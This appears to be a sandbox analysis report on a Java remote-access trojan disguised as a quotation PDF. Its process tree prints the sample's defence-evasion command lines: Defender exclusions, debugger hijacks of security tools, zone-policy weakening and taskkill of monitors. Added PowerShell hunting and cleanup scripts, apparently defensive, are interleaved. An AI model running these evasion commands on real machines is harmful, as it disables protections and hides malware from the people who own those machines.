Analysis
-
max time kernel
149s -
max time network
144s -
platform
windows7_x64 -
resource
win7 -
submitted
18-08-2020 19:21
Static task
static1
Behavioral task
behavioral1
Sample
TECHNO GROUP REQUEST FOR QUOTATION RFQ_pdf.jar
Resource
win7
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
TECHNO GROUP REQUEST FOR QUOTATION RFQ_pdf.jar
Resource
win10v200722
0 signatures
0 seconds
General
-
Target
TECHNO GROUP REQUEST FOR QUOTATION RFQ_pdf.jar
-
Size
411KB
-
MD5
f29f8a490d27bb40bfc0bc597afb8afb
-
SHA1
34c8a7efcbffebada0711cbf8a31822f4de0ca9c
-
SHA256
bec1e9a4fe86006e3e32848e8b2a8db1c9e6505fe4b6a37d4d9a25e9e0a7cb8c
-
SHA512
9010f364fdcf603e68e5b97a4429f480903ed5978d7e61a383f6246cbac6e07d9bc584634481478a1e4eca60869e663e62b95d34d9875ef6e977f8ba119bb72d
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral1/files/0x000300000001353a-7.dat qarallax_dll -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 616 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process
Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\"" java.exe
Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\"" java.exe
-
Drops desktop.ini file(s) 4 IoCs
description ioc Process
File opened for modification C:\Users\Admin\ujTBR\Desktop.ini attrib.exe
File opened for modification C:\Users\Admin\ujTBR\Desktop.ini attrib.exe
File opened for modification C:\Users\Admin\ujTBR\Desktop.ini java.exe
File created C:\Users\Admin\ujTBR\Desktop.ini java.exe
-
Drops file in System32 directory 2 IoCs
description ioc Process
File created C:\Windows\System32\iBoOZ java.exe
File opened for modification C:\Windows\System32\iBoOZ java.exe
-
Kills process with taskkill 19 IoCs
pid Process 1964 taskkill.exe 1912 taskkill.exe 1828 taskkill.exe 1072 taskkill.exe 1136 taskkill.exe 1952 taskkill.exe 1992 taskkill.exe 1520 taskkill.exe 1544 taskkill.exe 1328 taskkill.exe 1916 taskkill.exe 1868 taskkill.exe 1632 taskkill.exe 1916 taskkill.exe 1940 taskkill.exe 1080 taskkill.exe 320 taskkill.exe 1644 taskkill.exe 1040 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1648 powershell.exe 1648 powershell.exe -
Suspicious use of AdjustPrivilegeToken 100 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 616 java.exe -
Suspicious use of WriteProcessMemory 798 IoCs
-
wrote to memory of 744 1344 cmd.exe 273 PID 616 wrote to memory of 2024 616 java.exe 274 PID 616 wrote to memory of 2024 616 java.exe 274 PID 616 wrote to memory of 2024 616 java.exe 274 PID 2024 wrote to memory of 1328 2024 cmd.exe 275 PID 2024 wrote to memory of 1328 2024 cmd.exe 275 PID 2024 wrote to memory of 1328 2024 cmd.exe 275 PID 2024 wrote to memory of 1256 2024 cmd.exe 276 PID 2024 wrote to memory of 1256 2024 cmd.exe 276 PID 2024 wrote to memory of 1256 2024 cmd.exe 276 PID 616 wrote to memory of 1952 616 java.exe 277 PID 616 wrote to memory of 1952 616 java.exe 277 PID 616 wrote to memory of 1952 616 java.exe 277 PID 1952 wrote to memory of 1964 1952 cmd.exe 278 PID 1952 wrote to memory of 1964 1952 cmd.exe 278 PID 1952 wrote to memory of 1964 1952 cmd.exe 278 PID 1952 wrote to memory of 1848 1952 cmd.exe 279 PID 1952 wrote to memory of 1848 1952 cmd.exe 279 PID 1952 wrote to memory of 1848 1952 cmd.exe 279 PID 616 wrote to memory of 648 616 java.exe 280 PID 616 wrote to memory of 648 616 java.exe 280 PID 616 wrote to memory of 648 616 java.exe 280 PID 648 wrote to memory of 1984 648 cmd.exe 281 PID 648 wrote to memory of 1984 648 cmd.exe 281 PID 648 wrote to memory of 1984 648 cmd.exe 281 PID 648 wrote to memory of 1972 648 cmd.exe 282 PID 648 wrote to memory of 1972 648 cmd.exe 282 PID 648 wrote to memory of 1972 648 cmd.exe 282 PID 616 wrote to memory of 2000 616 java.exe 283 PID 616 wrote to memory of 2000 616 java.exe 283 PID 616 wrote to memory of 2000 616 java.exe 283 PID 2000 wrote to memory of 1980 2000 cmd.exe 284 PID 2000 wrote to memory of 1980 2000 cmd.exe 284 PID 2000 wrote to memory of 1980 2000 cmd.exe 284 PID 2000 wrote to memory of 2040 2000 cmd.exe 285 PID 2000 wrote to memory of 2040 2000 cmd.exe 285 PID 2000 wrote to memory of 2040 2000 cmd.exe 285 PID 616 wrote to memory of 1744 616 java.exe 286 PID 616 wrote to memory of 1744 616 java.exe 286 PID 616 wrote to memory of 1744 616 java.exe 286 PID 1744 wrote to memory of 1648 1744 
cmd.exe 287 PID 1744 wrote to memory of 1648 1744 cmd.exe 287 PID 1744 wrote to memory of 1648 1744 cmd.exe 287 PID 1744 wrote to memory of 320 1744 cmd.exe 288 PID 1744 wrote to memory of 320 1744 cmd.exe 288 PID 1744 wrote to memory of 320 1744 cmd.exe 288 PID 616 wrote to memory of 2044 616 java.exe 289 PID 616 wrote to memory of 2044 616 java.exe 289 PID 616 wrote to memory of 2044 616 java.exe 289 PID 2044 wrote to memory of 1072 2044 cmd.exe 290 PID 2044 wrote to memory of 1072 2044 cmd.exe 290 PID 2044 wrote to memory of 1072 2044 cmd.exe 290 PID 2044 wrote to memory of 1896 2044 cmd.exe 291 PID 2044 wrote to memory of 1896 2044 cmd.exe 291 PID 2044 wrote to memory of 1896 2044 cmd.exe 291 PID 616 wrote to memory of 1948 616 java.exe 292 PID 616 wrote to memory of 1948 616 java.exe 292 PID 616 wrote to memory of 1948 616 java.exe 292 PID 1948 wrote to memory of 1580 1948 cmd.exe 293 PID 1948 wrote to memory of 1580 1948 cmd.exe 293 PID 1948 wrote to memory of 1580 1948 cmd.exe 293 PID 1948 wrote to memory of 1636 1948 cmd.exe 294 PID 1948 wrote to memory of 1636 1948 cmd.exe 294 PID 1948 wrote to memory of 1636 1948 cmd.exe 294 PID 616 wrote to memory of 1976 616 java.exe 295 PID 616 wrote to memory of 1976 616 java.exe 295 PID 616 wrote to memory of 1976 616 java.exe 295 PID 1976 wrote to memory of 1780 1976 cmd.exe 296 PID 1976 wrote to memory of 1780 1976 cmd.exe 296 PID 1976 wrote to memory of 1780 1976 cmd.exe 296 PID 1976 wrote to memory of 1424 1976 cmd.exe 297 PID 1976 wrote to memory of 1424 1976 cmd.exe 297 PID 1976 wrote to memory of 1424 1976 cmd.exe 297 PID 616 wrote to memory of 2020 616 java.exe 298 PID 616 wrote to memory of 2020 616 java.exe 298 PID 616 wrote to memory of 2020 616 java.exe 298 PID 2020 wrote to memory of 1116 2020 cmd.exe 299 PID 2020 wrote to memory of 1116 2020 cmd.exe 299 PID 2020 wrote to memory of 1116 2020 cmd.exe 299 PID 2020 wrote to memory of 1532 2020 cmd.exe 300 PID 2020 wrote to memory of 1532 2020 cmd.exe 300 
PID 2020 wrote to memory of 1532 2020 cmd.exe 300 PID 616 wrote to memory of 688 616 java.exe 301 PID 616 wrote to memory of 688 616 java.exe 301 PID 616 wrote to memory of 688 616 java.exe 301 PID 688 wrote to memory of 1184 688 cmd.exe 302 PID 688 wrote to memory of 1184 688 cmd.exe 302 PID 688 wrote to memory of 1184 688 cmd.exe 302 PID 688 wrote to memory of 1544 688 cmd.exe 303 PID 688 wrote to memory of 1544 688 cmd.exe 303 PID 688 wrote to memory of 1544 688 cmd.exe 303 PID 616 wrote to memory of 1256 616 java.exe 304 PID 616 wrote to memory of 1256 616 java.exe 304 PID 616 wrote to memory of 1256 616 java.exe 304 PID 1256 wrote to memory of 1492 1256 cmd.exe 305 PID 1256 wrote to memory of 1492 1256 cmd.exe 305 PID 1256 wrote to memory of 1492 1256 cmd.exe 305 PID 1256 wrote to memory of 1092 1256 cmd.exe 306 PID 1256 wrote to memory of 1092 1256 cmd.exe 306 PID 1256 wrote to memory of 1092 1256 cmd.exe 306 PID 616 wrote to memory of 680 616 java.exe 307 PID 616 wrote to memory of 680 616 java.exe 307 PID 616 wrote to memory of 680 616 java.exe 307 PID 680 wrote to memory of 1984 680 cmd.exe 308 PID 680 wrote to memory of 1984 680 cmd.exe 308 PID 680 wrote to memory of 1984 680 cmd.exe 308 PID 680 wrote to memory of 1516 680 cmd.exe 309 PID 680 wrote to memory of 1516 680 cmd.exe 309 PID 680 wrote to memory of 1516 680 cmd.exe 309 PID 616 wrote to memory of 820 616 java.exe 310 PID 616 wrote to memory of 820 616 java.exe 310 PID 616 wrote to memory of 820 616 java.exe 310 PID 820 wrote to memory of 2040 820 cmd.exe 311 PID 820 wrote to memory of 2040 820 cmd.exe 311 PID 820 wrote to memory of 2040 820 cmd.exe 311 PID 820 wrote to memory of 748 820 cmd.exe 312 PID 820 wrote to memory of 748 820 cmd.exe 312 PID 820 wrote to memory of 748 820 cmd.exe 312 PID 616 wrote to memory of 240 616 java.exe 313 PID 616 wrote to memory of 240 616 java.exe 313 PID 616 wrote to memory of 240 616 java.exe 313 PID 240 wrote to memory of 1904 240 cmd.exe 314 PID 240 wrote to 
memory of 1904 240 cmd.exe 314 PID 240 wrote to memory of 1904 240 cmd.exe 314 PID 240 wrote to memory of 1552 240 cmd.exe 315 PID 240 wrote to memory of 1552 240 cmd.exe 315 PID 240 wrote to memory of 1552 240 cmd.exe 315 PID 616 wrote to memory of 2000 616 java.exe 316 PID 616 wrote to memory of 2000 616 java.exe 316 PID 616 wrote to memory of 2000 616 java.exe 316 PID 2000 wrote to memory of 1860 2000 cmd.exe 317 PID 2000 wrote to memory of 1860 2000 cmd.exe 317 PID 2000 wrote to memory of 1860 2000 cmd.exe 317 PID 2000 wrote to memory of 1820 2000 cmd.exe 318 PID 2000 wrote to memory of 1820 2000 cmd.exe 318 PID 2000 wrote to memory of 1820 2000 cmd.exe 318 PID 616 wrote to memory of 1840 616 java.exe 319 PID 616 wrote to memory of 1840 616 java.exe 319 PID 616 wrote to memory of 1840 616 java.exe 319 PID 1840 wrote to memory of 2032 1840 cmd.exe 320 PID 1840 wrote to memory of 2032 1840 cmd.exe 320 PID 1840 wrote to memory of 2032 1840 cmd.exe 320 PID 1840 wrote to memory of 796 1840 cmd.exe 321 PID 1840 wrote to memory of 796 1840 cmd.exe 321 PID 1840 wrote to memory of 796 1840 cmd.exe 321 PID 616 wrote to memory of 624 616 java.exe 322 PID 616 wrote to memory of 624 616 java.exe 322 PID 616 wrote to memory of 624 616 java.exe 322 PID 624 wrote to memory of 1340 624 cmd.exe 323 PID 624 wrote to memory of 1340 624 cmd.exe 323 PID 624 wrote to memory of 1340 624 cmd.exe 323 PID 624 wrote to memory of 1932 624 cmd.exe 324 PID 624 wrote to memory of 1932 624 cmd.exe 324 PID 624 wrote to memory of 1932 624 cmd.exe 324 PID 616 wrote to memory of 1940 616 java.exe 325 PID 616 wrote to memory of 1940 616 java.exe 325 PID 616 wrote to memory of 1940 616 java.exe 325 PID 616 wrote to memory of 1592 616 java.exe 327 PID 616 wrote to memory of 1592 616 java.exe 327 PID 616 wrote to memory of 1592 616 java.exe 327 PID 1592 wrote to memory of 1628 1592 cmd.exe 328 PID 1592 wrote to memory of 1628 1592 cmd.exe 328 PID 1592 wrote to memory of 1628 1592 cmd.exe 328 PID 1592 
wrote to memory of 1884 1592 cmd.exe 329 PID 1592 wrote to memory of 1884 1592 cmd.exe 329 PID 1592 wrote to memory of 1884 1592 cmd.exe 329 PID 616 wrote to memory of 1952 616 java.exe 330 PID 616 wrote to memory of 1952 616 java.exe 330 PID 616 wrote to memory of 1952 616 java.exe 330 PID 616 wrote to memory of 1080 616 java.exe 332 PID 616 wrote to memory of 1080 616 java.exe 332 PID 616 wrote to memory of 1080 616 java.exe 332 PID 616 wrote to memory of 1916 616 java.exe 334 PID 616 wrote to memory of 1916 616 java.exe 334 PID 616 wrote to memory of 1916 616 java.exe 334 PID 616 wrote to memory of 1964 616 java.exe 336 PID 616 wrote to memory of 1964 616 java.exe 336 PID 616 wrote to memory of 1964 616 java.exe 336 PID 616 wrote to memory of 1912 616 java.exe 338 PID 616 wrote to memory of 1912 616 java.exe 338 PID 616 wrote to memory of 1912 616 java.exe 338 PID 616 wrote to memory of 1520 616 java.exe 340 PID 616 wrote to memory of 1520 616 java.exe 340 PID 616 wrote to memory of 1520 616 java.exe 340 PID 616 wrote to memory of 1828 616 java.exe 342 PID 616 wrote to memory of 1828 616 java.exe 342 PID 616 wrote to memory of 1828 616 java.exe 342 -
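The WriteProcessMemory records above are the sandbox's view of java.exe (PID 616) starting cmd.exe children, which in turn start the reg.exe, WMIC.exe and taskkill.exe instances whose command lines appear under Processes. The PowerShell below is an added example, not part of this report or of the sample: it hunts Sysmon process-creation events (Event ID 1) on a live host for the same parent/child chain and for command lines matching the sample's discovery and defense-evasion steps. It assumes Sysmon is installed and logging to Microsoft-Windows-Sysmon/Operational; the -Since parameter and the pattern list are this example's own.

```powershell
# Added example (not from the report or the sample): hunt Sysmon Event ID 1 for the
# java.exe/javaw.exe -> cmd.exe -> reg/taskkill/WMIC/attrib/powershell chain and for the
# command lines this sample uses. Run in an elevated session on a host with Sysmon.
param(
    [datetime]$Since = (Get-Date).AddDays(-7)   # assumed parameter, not from the report
)

# Command-line patterns lifted from the process tree in this report.
$suspiciousCmd = @(
    'Image File Execution Options\\[^"]+"\s+/v\s+debugger',   # IFEO Debugger hijack via reg.exe add
    'Add-MpPreference\s+-Exclusion',                          # Defender exclusions via PowerShell
    'Windows Defender.*Disable(AntiSpyware|BehaviorMonitoring|OnAccessProtection|ScanOnRealtimeEnable)',
    'SystemRestore.*Disable(SR|Config)',
    'DisableTaskMgr',
    'SEE_MASK_NOZONECHECKS|SaveZoneInformation|LowRiskFileTypes',
    'taskkill(\.exe)?"?\s+/IM\s+"?(Taskmgr|ProcessHacker|procexp|MSASCui|MSASCuiL|MsMpEng|MpUXSrv|UserAccountControlSettings)\.exe',
    'root\\SecurityCenter2.*(AntiVirus|Firewall)Product'     # AV/firewall discovery via WMIC
)
$cmdRegex = $suspiciousCmd -join '|'

$filter = @{
    LogName   = 'Microsoft-Windows-Sysmon/Operational'
    Id        = 1
    StartTime = $Since
}

Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
    # Pull the named EventData fields (Image, CommandLine, ParentImage, ...) out of the event XML.
    $x = [xml]$_.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

    $parentIsJava  = $d.ParentImage -match '\\javaw?\.exe$'
    $childIsLolbin = $d.Image -match '\\(cmd|reg|taskkill|attrib|WMIC|powershell)\.exe$'
    $cmdHit        = $d.CommandLine -match $cmdRegex

    # Report either the parent/child shape or a command-line match; CmdHit separates
    # this sample's behaviour from a benign Java application that merely shells out.
    if (($parentIsJava -and $childIsLolbin) -or $cmdHit) {
        [pscustomobject]@{
            Time        = $_.TimeCreated
            Pid         = $d.ProcessId
            Image       = $d.Image
            ParentImage = $d.ParentImage
            CmdHit      = $cmdHit
            CommandLine = $d.CommandLine
        }
    }
} | Sort-Object Time | Format-Table -AutoSize -Wrap
```

Security event 4688 can stand in for Sysmon only if process command-line auditing is enabled, and older Windows versions record the parent there only as a Creator Process ID, so the parent check would need a join against the parent's own 4688 event. The chain shape alone also fires on any Java application that runs cmd.exe; treat the CmdHit column as the high-confidence signal.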
Views/modifies file attributes 1 TTPs 8 IoCs
pid   Process
1764  attrib.exe
1744  attrib.exe
1824  attrib.exe
1840  attrib.exe
1852  attrib.exe
1188  attrib.exe
1784  attrib.exe
1780  attrib.exe
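The process tree below shows the sample's whole defense-evasion and persistence routine as discrete reg.exe, taskkill.exe, attrib.exe and powershell.exe invocations. The script that follows is an added example, not part of this report or of the sample: it audits a Windows host for the artifacts those commands leave behind (IFEO "debugger" hijacks pointing at svchost.exe, the Windows Defender and System Restore policy values, the attachment-zone policies, Run/RunOnce entries that launch javaw.exe -jar, and Defender exclusions) and, with -Remediate, removes them. Run it from an elevated 64-bit PowerShell as the affected user (the HKCU checks read the current user's hive). The -Remediate switch, Add-Finding and the pattern lists are this example's own.

```powershell
# Added example (not from the report or the sample): audit and optionally undo the
# registry and Defender changes the process tree in this report shows the sample making.
[CmdletBinding()]
param([switch]$Remediate)   # assumed switch, defined by this example

$findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Kind, [string]$Location, $Value) {
    $findings.Add([pscustomobject]@{ Kind = $Kind; Location = $Location; Value = $Value })
}

# 1. IFEO Debugger values. The sample points Taskmgr, ProcessHacker, procexp, Procmon,
#    the Wireshark binaries and the Defender binaries at svchost.exe, so launching any of
#    them runs svchost.exe instead. A Debugger value is rare outside a developer box;
#    one naming svchost.exe is never legitimate.
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
Get-ChildItem -Path $ifeo -ErrorAction SilentlyContinue | ForEach-Object {
    $dbg = (Get-ItemProperty -Path $_.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if ($dbg) {
        Add-Finding 'IFEO Debugger' "$ifeo\$($_.PSChildName)" $dbg
        if ($Remediate) { Remove-ItemProperty -Path $_.PSPath -Name Debugger }
    }
}

# 2. Values written with "reg.exe add". None exist on a default install; a hit is this
#    sample, similar malware, or your own Group Policy (which would re-apply it).
$policyValues = @(
    @('HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender',                      'DisableAntiSpyware'),
    @('HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection', 'DisableBehaviorMonitoring'),
    @('HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection', 'DisableOnAccessProtection'),
    @('HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection', 'DisableScanOnRealtimeEnable'),
    @('HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore',              'DisableSR'),
    @('HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore',              'DisableConfig'),
    @('HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System',         'DisableTaskMgr'),
    @('HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments',    'SaveZoneInformation'),
    @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments',    'SaveZoneInformation'),
    @('HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Associations',   'LowRiskFileTypes'),
    @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations',   'LowRiskFileTypes'),
    @('HKCU:\Environment',                                                        'SEE_MASK_NOZONECHECKS'),
    @('HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment',      'SEE_MASK_NOZONECHECKS')
)
foreach ($pv in $policyValues) {
    $path, $name = $pv
    $item = Get-ItemProperty -Path $path -Name $name -ErrorAction SilentlyContinue
    if ($null -ne $item) {
        Add-Finding 'Policy value' "$path\$name" $item.$name
        if ($Remediate) { Remove-ItemProperty -Path $path -Name $name }
    }
}

# 3. Run / RunOnce values that launch a JAR through javaw.exe. The sample registers
#    HfdZkYR pointing at a JRE copied under the user profile (C:\Users\Admin\Oracle).
foreach ($runKey in 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
                    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce') {
    $props = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -in 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider') { continue }
        if ("$($p.Value)" -match 'javaw?\.exe.*\s-jar\s') {
            Add-Finding 'Run key' "$runKey\$($p.Name)" $p.Value
            if ($Remediate) { Remove-ItemProperty -Path $runKey -Name $p.Name }
        }
    }
}

# 4. Defender exclusions added with Add-MpPreference. Every exclusion is reported; only
#    the classes the sample adds (user-profile paths, executable extensions, and the
#    LOLBins it lists) are removed, so review the report before trusting -Remediate here.
if (Get-Command Get-MpPreference -ErrorAction SilentlyContinue) {
    $mp = Get-MpPreference
    foreach ($kind in 'ExclusionPath', 'ExclusionExtension', 'ExclusionProcess') {
        foreach ($entry in @($mp.$kind)) { if ($entry) { Add-Finding "Defender $kind" $entry '' } }
    }
    if ($Remediate) {
        $paths = @($mp.ExclusionPath      | Where-Object { $_ -like 'C:\Users\*' })
        $exts  = @($mp.ExclusionExtension | Where-Object { $_ -in 'jar', 'exe', 'dll', 'hta', 'vbs', 'js', 'scr' })
        $procs = @($mp.ExclusionProcess   | Where-Object { $_ -match '^(javaw?|reg|regedit|tasklist|netstat|cmd|netsh|taskkill)\.exe$' })
        if ($paths) { Remove-MpPreference -ExclusionPath $paths }
        if ($exts)  { Remove-MpPreference -ExclusionExtension $exts }
        if ($procs) { Remove-MpPreference -ExclusionProcess $procs }
    }
}

$findings | Format-Table -AutoSize -Wrap
```

Two caveats when using this against the sample's run. First, the Defender PowerShell module does not exist on Windows 7, the platform of this run, so the Add-MpPreference step and the check in section 4 only matter on Windows 8 and later; on current Windows MsMpEng.exe is also a protected process, so the taskkill against it fails and the IFEO entries are the part that actually persists. Second, -Remediate does not delete the dropped files: the sample hides C:\Users\Admin\Oracle, C:\Users\Admin\ujTBR and C:\Users\Admin\.ntusernt.ini with attrib +h +s +r, so clear those attributes (attrib -h -s -r) before removing them, and restart the Defender service (Start-Service WinDefend) if it was stopped.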
Processes
-
[1] C:\Windows\system32\java.exe  (PID 616)
    cmdline: java -jar "C:\Users\Admin\AppData\Local\Temp\TECHNO GROUP REQUEST FOR QUOTATION RFQ_pdf.jar"
    - Loads dropped DLL
    - Adds Run key to start application
    - Drops desktop.ini file(s)
    - Drops file in System32 directory
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\system32\cmd.exe  (PID 288)
        cmdline: cmd.exe
    [2] C:\Windows\system32\cmd.exe  (PID 680)
        cmdline: cmd.exe
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\System32\Wbem\WMIC.exe  (PID 1072)
            cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
            - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\system32\cmd.exe  (PID 1524)
        cmdline: cmd.exe
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\System32\Wbem\WMIC.exe  (PID 1496)
            cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
            - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\system32\attrib.exe  (PID 1824)
        cmdline: attrib +h C:\Users\Admin\Oracle
        - Views/modifies file attributes
    [2] C:\Windows\system32\attrib.exe  (PID 1840)
        cmdline: attrib +h +r +s C:\Users\Admin\.ntusernt.ini
        - Views/modifies file attributes
    [2] C:\Windows\system32\attrib.exe  (PID 1852)
        cmdline: attrib -s -r C:\Users\Admin\ujTBR\Desktop.ini
        - Drops desktop.ini file(s)
        - Views/modifies file attributes
    [2] C:\Windows\system32\attrib.exe  (PID 1188)
        cmdline: attrib +s +r C:\Users\Admin\ujTBR\Desktop.ini
        - Drops desktop.ini file(s)
        - Views/modifies file attributes
    [2] C:\Windows\system32\attrib.exe  (PID 1784)
        cmdline: attrib -s -r C:\Users\Admin\ujTBR
        - Views/modifies file attributes
    [2] C:\Windows\system32\attrib.exe  (PID 1780)
        cmdline: attrib +s +r C:\Users\Admin\ujTBR
        - Views/modifies file attributes
    [2] C:\Windows\system32\attrib.exe  (PID 1764)
        cmdline: attrib +h C:\Users\Admin\ujTBR
        - Views/modifies file attributes
    [2] C:\Windows\system32\attrib.exe  (PID 1744)
        cmdline: attrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class
        - Views/modifies file attributes
    [2] C:\Windows\system32\cmd.exe  (PID 1628)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1472)
            cmdline: reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 328)
            cmdline: reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1648)
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
        - Suspicious behavior: EnumeratesProcesses
    [2] C:\Windows\System32\taskkill.exe  (PID 1544)
        cmdline: "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
        - Kills process with taskkill
    [2] C:\Windows\System32\reg.exe  (PID 1908)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\System32\reg.exe  (PID 1932)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
    [2] C:\Windows\System32\reg.exe  (PID 1948)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
    [2] C:\Windows\System32\reg.exe  (PID 1980)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\System32\reg.exe  (PID 1168)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
    [2] C:\Windows\System32\reg.exe  (PID 1032)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\System32\reg.exe  (PID 1424)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
    [2] C:\Windows\System32\reg.exe  (PID 472)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\System32\reg.exe  (PID 744)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\System32\reg.exe  (PID 1532)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
    [2] C:\Windows\System32\reg.exe  (PID 1804)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\system32\cmd.exe  (PID 792)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1912)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1256)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    [2] C:\Windows\System32\reg.exe  (PID 1816)
